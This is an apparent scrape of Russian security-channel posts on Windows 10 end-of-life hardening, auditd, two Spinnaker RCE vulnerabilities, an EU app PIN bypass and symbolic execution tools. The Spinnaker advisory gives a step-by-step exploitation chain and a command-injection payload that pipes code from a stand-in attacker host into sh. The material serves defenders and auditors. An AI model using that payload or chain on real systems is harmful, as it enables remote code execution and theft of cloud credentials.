120 машин с Windows 10 — и ни одна не готова к EOL
На трёх последних внутренних пентестах — банк, производство, госструктура — картина одинаковая: дефолтные GPO, открытый SMBv1, LSASS без защиты. Mimikatz снимал хеши за секунды, а Pass-the-Hash давал lateral movement до контроллера домена за минуты. И это ещё до окончания поддержки.
После 14 октября 2025 каждая новая CVE в ядре Windows 10 становится перманентным 0-day. Microsoft патчит Windows 11 — diff между версиями публикуется открыто. Злоумышленник берёт октябрьский Patch Tuesday для Windows 11, reverse-diff'ит и пишет эксплойт для «десятки», где fix не появится никогда. Это не теория — после EOL Windows 7 массовая эксплуатация началась за считанные месяцы.
🔍 Что проверить в первую очередь
Вот шесть точек, которые я проверяю и как атакующий, и как автор рекомендаций в отчёте:
•
•
• UAC level = 5 (дефолт)? Обход через десятки публичных техник
• Credential Guard не активен? NTLM-хеши лежат в памяти открытым текстом
• PowerShell в режиме
• WDigest не отключён? Пароли хранятся в памяти в открытом виде даже при включённом RunAsPPL
⚙️ Три быстрых действия, которые поднимают планку атаки на порядок
1. Включить
2. Отключить WDigest: ключ
3. Убить SMBv1:
🛡 Важный нюанс: сигнатуры Defender будут приходить до 2028 года. Но антивирус ловит известные вредоносы, а не закрывает дыру в
Для автоматизации аудита — HardeningKitty прогоняет хост по CIS Benchmark, а PingCastle сканирует AD целиком.
Полный чеклист с командами, GPO-настройками и привязкой к MITRE ATT&CK — в статье на форуме.
https://codeby.net/threads/khardening-windows-10-11-posle-okonchaniya-podderzhki-cheklist-dlya-pentestera-i-administratora.92954/
На трёх последних внутренних пентестах — банк, производство, госструктура — картина одинаковая: дефолтные GPO, открытый SMBv1, LSASS без защиты. Mimikatz снимал хеши за секунды, а Pass-the-Hash давал lateral movement до контроллера домена за минуты. И это ещё до окончания поддержки.
После 14 октября 2025 каждая новая CVE в ядре Windows 10 становится перманентным 0-day. Microsoft патчит Windows 11 — diff между версиями публикуется открыто. Злоумышленник берёт октябрьский Patch Tuesday для Windows 11, reverse-diff'ит и пишет эксплойт для «десятки», где fix не появится никогда. Это не теория — после EOL Windows 7 массовая эксплуатация началась за считанные месяцы.
🔍 Что проверить в первую очередь
Вот шесть точек, которые я проверяю и как атакующий, и как автор рекомендаций в отчёте:
•
RunAsPPL в реестре — значение 0 или отсутствует? Mimikatz снимет хеши без усилий•
EnableSMB1Protocol = True? Хост открыт для relay-атак и целого класса RCE• UAC level = 5 (дефолт)? Обход через десятки публичных техник
• Credential Guard не активен? NTLM-хеши лежат в памяти открытым текстом
• PowerShell в режиме
FullLanguage? Любой payload выполнится без ограничений• WDigest не отключён? Пароли хранятся в памяти в открытом виде даже при включённом RunAsPPL
⚙️ Три быстрых действия, которые поднимают планку атаки на порядок
1. Включить
RunAsPPL: одна строка в реестре, перезагрузка — и стандартный Mimikatz ловит ошибку доступа. Обход через BYOVD требует kernel-level доступа и конкретного уязвимого драйвера. Совсем другой уровень сложности.2. Отключить WDigest: ключ
UseLogonCredential = 0. Без этого пароли валяются в памяти в открытом виде. Видел на реальном проекте — RunAsPPL включили, WDigest забыли. Половина работы впустую.3. Убить SMBv1:
Set-SmbServerConfiguration -EnableSMB1Protocol $false. Протокол из 2006 года не нужен в 2025-м. Если что-то сломается — значит в сети есть legacy-система, которая сама по себе проблема.🛡 Важный нюанс: сигнатуры Defender будут приходить до 2028 года. Но антивирус ловит известные вредоносы, а не закрывает дыру в
win32k.sys или ntoskrnl.exe. Это как замок на двери с дырой размером с кулак.Для автоматизации аудита — HardeningKitty прогоняет хост по CIS Benchmark, а PingCastle сканирует AD целиком.
Полный чеклист с командами, GPO-настройками и привязкой к MITRE ATT&CK — в статье на форуме.
https://codeby.net/threads/khardening-windows-10-11-posle-okonchaniya-podderzhki-cheklist-dlya-pentestera-i-administratora.92954/
👍10❤5🔥5👎1
Auditd — это встроенная система аудита в Linux, которая записывает кто, что и когда сделал в системе.
Если тебе нужно понять, *кто удалил файл*, *кто получил доступ к /etc/shadow* или *когда изменили конфиг* — это как раз его задача.
Auditd состоит из нескольких частей:
Auditd умеет фиксировать почти всё:
В большинстве дистрибутивов Auditd доступен из стандартных репозиториев:
Debian / Ubuntu:
apt install auditd audispd-plugins
RHEL / CentOS:
yum install audit
После установки сервис обычно запускается автоматически. При необходимости:
systemctl enable auditd
systemctl start auditd
Добавим правило для отслеживания изменений файла
/etc/passwd:auditctl -w /etc/passwd -p wa -k passwd_changes
Параметры:
-w — указание файла для наблюдения-p wa — отслеживание записи (write) и изменения атрибутов (attribute)-k — ключ для удобного поиска событийЖурналы аудита по умолчанию сохраняются в:
/var/log/audit/audit.log
Для анализа рекомендуется использовать:
*
ausearch — выборка событий*
aureport — генерация отчетов#linux #auditd #cybersecurity #infosec #sysadmin #logging #security #devops
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤6🔥4👎1
Две девятки по CVSS в Spinnaker: как обычная учётка превращается в shell на production
Spinnaker — платформа для управления деплоями от Netflix, которую используют Google, Cisco и сотни enterprise-команд. В апреле 2026 года в ней нашли две критические уязвимости с оценкой CVSS 9.9. Обе эксплуатируются пользователем без привилегий — достаточно просто быть аутентифицированным.
🔥 CVE-2026-32604 — command injection в clouddriver. Поле
🔑 CVE-2026-32613 — SpEL-инъекция в Echo, сервисе нотификаций и триггеров. Spring Expression Language позволяет выполнить произвольный Java-код на сервере. Тут нужен WRITE на одно application, но результат тот же — полный RCE.
Почему это так больно? Архитектура Spinnaker построена на модели доверия периметру: Gate аутентифицирует запросы на входе, а дальше все 10+ микросервисов общаются друг с другом внутри Kubernetes-кластера без проверки прав. Получил shell на clouddriver — а там лежат production-credentials к AWS, GCP, Azure. Полностью доверенная зона, без токенов, без вопросов.
⚡️ Цепочка эксплуатации CVE-2026-32604 выглядит до обидного просто:
1. Аутентифицироваться в Gate (любая учётка)
2. Запросить
3. Найти аккаунт с типом TOKEN или USER_PASS
4. Отправить
Всё. Command injection уровня «первый семестр secure coding», а CVSS — 9.9. Clouddriver выполнит ваш скрипт с правами пода, в котором хранятся ключи от production-облаков.
Что делать прямо сейчас:
• Обновиться до Spinnaker 2026.0.1, 2025.4.2 или 2025.3.2
• Проверить, не торчит ли Gate наружу (ZeroPath находила публичные инстансы)
• Аудит artifact accounts — убрать неиспользуемые TOKEN/USER_PASS аккаунты
• Внедрить network policies между микросервисами — модель «доверяй всем внутри кластера» в 2026 году уже не работает
В полной статье — разбор обоих векторов до уровня конкретных строк кода, post-exploitation и то, что видит и не видит blue team.
https://codeby.net/threads/cve-2026-32604-i-cve-2026-32613-rce-v-spinnaker-ot-low-priv-autentifikatsii-do-shell-na-clouddriver-i-echo.92955/
Spinnaker — платформа для управления деплоями от Netflix, которую используют Google, Cisco и сотни enterprise-команд. В апреле 2026 года в ней нашли две критические уязвимости с оценкой CVSS 9.9. Обе эксплуатируются пользователем без привилегий — достаточно просто быть аутентифицированным.
🔥 CVE-2026-32604 — command injection в clouddriver. Поле
version из JSON-запроса к эндпоинту PUT /artifacts/fetch конкатенируется прямо в shell-команду без какой-либо санитизации. Буквально: clouddriver берёт пользовательский ввод и подставляет его в sh -c "git clone --branch YOUR_INPUT...". Точка с запятой в поле version — и вместо клонирования репозитория clouddriver выполняет произвольный код. Никаких специальных ролей не нужно — ни WRITE на application, ни EXECUTE на pipeline.🔑 CVE-2026-32613 — SpEL-инъекция в Echo, сервисе нотификаций и триггеров. Spring Expression Language позволяет выполнить произвольный Java-код на сервере. Тут нужен WRITE на одно application, но результат тот же — полный RCE.
Почему это так больно? Архитектура Spinnaker построена на модели доверия периметру: Gate аутентифицирует запросы на входе, а дальше все 10+ микросервисов общаются друг с другом внутри Kubernetes-кластера без проверки прав. Получил shell на clouddriver — а там лежат production-credentials к AWS, GCP, Azure. Полностью доверенная зона, без токенов, без вопросов.
⚡️ Цепочка эксплуатации CVE-2026-32604 выглядит до обидного просто:
1. Аутентифицироваться в Gate (любая учётка)
2. Запросить
GET /artifacts/credentials — эндпоинт отдаёт список всех artifact accounts без проверки ролей3. Найти аккаунт с типом TOKEN или USER_PASS
4. Отправить
PUT /artifacts/fetch с payload вида "version": "main; curl attacker|sh;"Всё. Command injection уровня «первый семестр secure coding», а CVSS — 9.9. Clouddriver выполнит ваш скрипт с правами пода, в котором хранятся ключи от production-облаков.
Что делать прямо сейчас:
• Обновиться до Spinnaker 2026.0.1, 2025.4.2 или 2025.3.2
• Проверить, не торчит ли Gate наружу (ZeroPath находила публичные инстансы)
• Аудит artifact accounts — убрать неиспользуемые TOKEN/USER_PASS аккаунты
• Внедрить network policies между микросервисами — модель «доверяй всем внутри кластера» в 2026 году уже не работает
В полной статье — разбор обоих векторов до уровня конкретных строк кода, post-exploitation и то, что видит и не видит blue team.
https://codeby.net/threads/cve-2026-32604-i-cve-2026-32613-rce-v-spinnaker-ot-low-priv-autentifikatsii-do-shell-na-clouddriver-i-echo.92955/
❤3👍1🔥1
Консультант по безопасности Пол Мур обнаружил, что приложение хранит зашифрованный PIN-код локально, но, что особенно важно, шифрование не привязано к хранилищу личных данных пользователя, где хранятся конфиденциальные данные для верификации.
Это открывает возможности для удивительно простого обхода защиты. Удалив определенные значения, связанные с PIN-кодом, из файлов конфигурации приложения и перезапустив его, злоумышленник может установить новый PIN-код, сохранив при этом доступ к учетным данным, созданным в предыдущем профиле.
Исследователь также указал на дополнительные уязвимости, которые еще больше упрощают перебор паролей или попытки их обойти:
Официальные лица признали, что представленная публике версия еще не является готовым потребительским продуктом, несмотря на то, что ее назвали «готовой». В Еврокомиссии заявили, что представленное приложение «обладает всеми функциями», которые планировались для пользователей, но подчеркнули, что на практике это «все еще демонстрационная версия».
По словам пресс-секретаря, ключевое отличие заключается в том, что приложение еще официально не представлено гражданам. Вместо этого его исходный код опубликован в открытом доступе специально для того, чтобы его можно было изучить.
#news #security #vulnerabilities
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4👍3🔥3❤2🤯1
6 строк кода вместо 4 часов реверса: как символьное исполнение ломает CTF-таски
На CSAW CTF 2015 задача «wyvern» из категории Reversing 500 содержала бинарь с десятками вложенных проверок ввода. Ручной реверс в Ghidra — часы работы. Скрипт на 6 строках angr решил её за 15 минут. Автоматически сгенерировал входные данные, удовлетворяющие каждому условию. Не магия, а математика.
🔬 Суть подхода простая. Вместо конкретных значений на вход подаются символические переменные — абстракции, которые могут быть чем угодно. На каждом ветвлении (
Если целевой точкой назначить вызов
⚡️ Но есть нюансы. Главный враг — path explosion. Каждое ветвление удваивает число состояний. Цикл на 1000 итераций с условием внутри — теоретически 2^1000 путей. А если проверка включает SHA-256 или другую криптографию, Z3 просто не решит constraints за разумное время. Поэтому символьное исполнение — фильтр, а не серебряная пуля.
Теперь к выбору инструмента. Три основных фреймворка:
• angr — самый зрелый и живой. Поддерживает x86/x64, ARM, MIPS. Еженедельные коммиты, богатая документация, десятки готовых примеров. На FlareOn 2015 Challenge 5 — решение за 2 минуты 10 секунд. ASIS CTF Finals 2015 — 3.6 секунды. Лучший выбор для CTF, пентеста, автоматизации рутинного реверса.
• Manticore — от Trail of Bits. Уникальная фишка — поддержка смарт-контрактов Ethereum. Помог обнаружить CVE-2020-5232 (CVSS 8.7) в Ethereum Name Service. Но разработка фактически остановилась — начинать новый проект на нём рискованно.
• Triton — заточен под динамический анализ. Работает не с абстрактным исполнением всех путей, а с конкретной трассой. Идеален для деобфускации, снятия MBA-выражений, точечного анализа конкретного пути исполнения.
🎯 Простое правило выбора: нужен автоматический обход всех путей — angr. Аудит смарт-контрактов — Manticore (с оговорками). Работа с конкретной трассой и деобфускация — Triton.
В полной статье — рабочий код для каждого фреймворка, decision tree выбора инструмента и честный разбор граничных случаев, где символьное исполнение ломается.
https://codeby.net/threads/simvol-noye-ispolneniye-dlya-poiska-uyazvimostei-angr-manticore-i-triton-na-praktike.92962/
На CSAW CTF 2015 задача «wyvern» из категории Reversing 500 содержала бинарь с десятками вложенных проверок ввода. Ручной реверс в Ghidra — часы работы. Скрипт на 6 строках angr решил её за 15 минут. Автоматически сгенерировал входные данные, удовлетворяющие каждому условию. Не магия, а математика.
🔬 Суть подхода простая. Вместо конкретных значений на вход подаются символические переменные — абстракции, которые могут быть чем угодно. На каждом ветвлении (
if, switch, граница цикла) движок создаёт два состояния и накапливает ограничения. В целевой точке — например, при вызове puts("Access granted") — всё передаётся SMT-солверу Z3, который решает систему уравнений и возвращает конкретный ввод. Никакого перебора — чистая математическая задача.Если целевой точкой назначить вызов
strcpy с контролируемым буфером, солвер найдёт ввод, приводящий к buffer overflow. Это уже не CTF — это автоматический поиск уязвимостей в реальных бинарях.⚡️ Но есть нюансы. Главный враг — path explosion. Каждое ветвление удваивает число состояний. Цикл на 1000 итераций с условием внутри — теоретически 2^1000 путей. А если проверка включает SHA-256 или другую криптографию, Z3 просто не решит constraints за разумное время. Поэтому символьное исполнение — фильтр, а не серебряная пуля.
Теперь к выбору инструмента. Три основных фреймворка:
• angr — самый зрелый и живой. Поддерживает x86/x64, ARM, MIPS. Еженедельные коммиты, богатая документация, десятки готовых примеров. На FlareOn 2015 Challenge 5 — решение за 2 минуты 10 секунд. ASIS CTF Finals 2015 — 3.6 секунды. Лучший выбор для CTF, пентеста, автоматизации рутинного реверса.
• Manticore — от Trail of Bits. Уникальная фишка — поддержка смарт-контрактов Ethereum. Помог обнаружить CVE-2020-5232 (CVSS 8.7) в Ethereum Name Service. Но разработка фактически остановилась — начинать новый проект на нём рискованно.
• Triton — заточен под динамический анализ. Работает не с абстрактным исполнением всех путей, а с конкретной трассой. Идеален для деобфускации, снятия MBA-выражений, точечного анализа конкретного пути исполнения.
🎯 Простое правило выбора: нужен автоматический обход всех путей — angr. Аудит смарт-контрактов — Manticore (с оговорками). Работа с конкретной трассой и деобфускация — Triton.
В полной статье — рабочий код для каждого фреймворка, decision tree выбора инструмента и честный разбор граничных случаев, где символьное исполнение ломается.
https://codeby.net/threads/simvol-noye-ispolneniye-dlya-poiska-uyazvimostei-angr-manticore-i-triton-na-praktike.92962/
❤2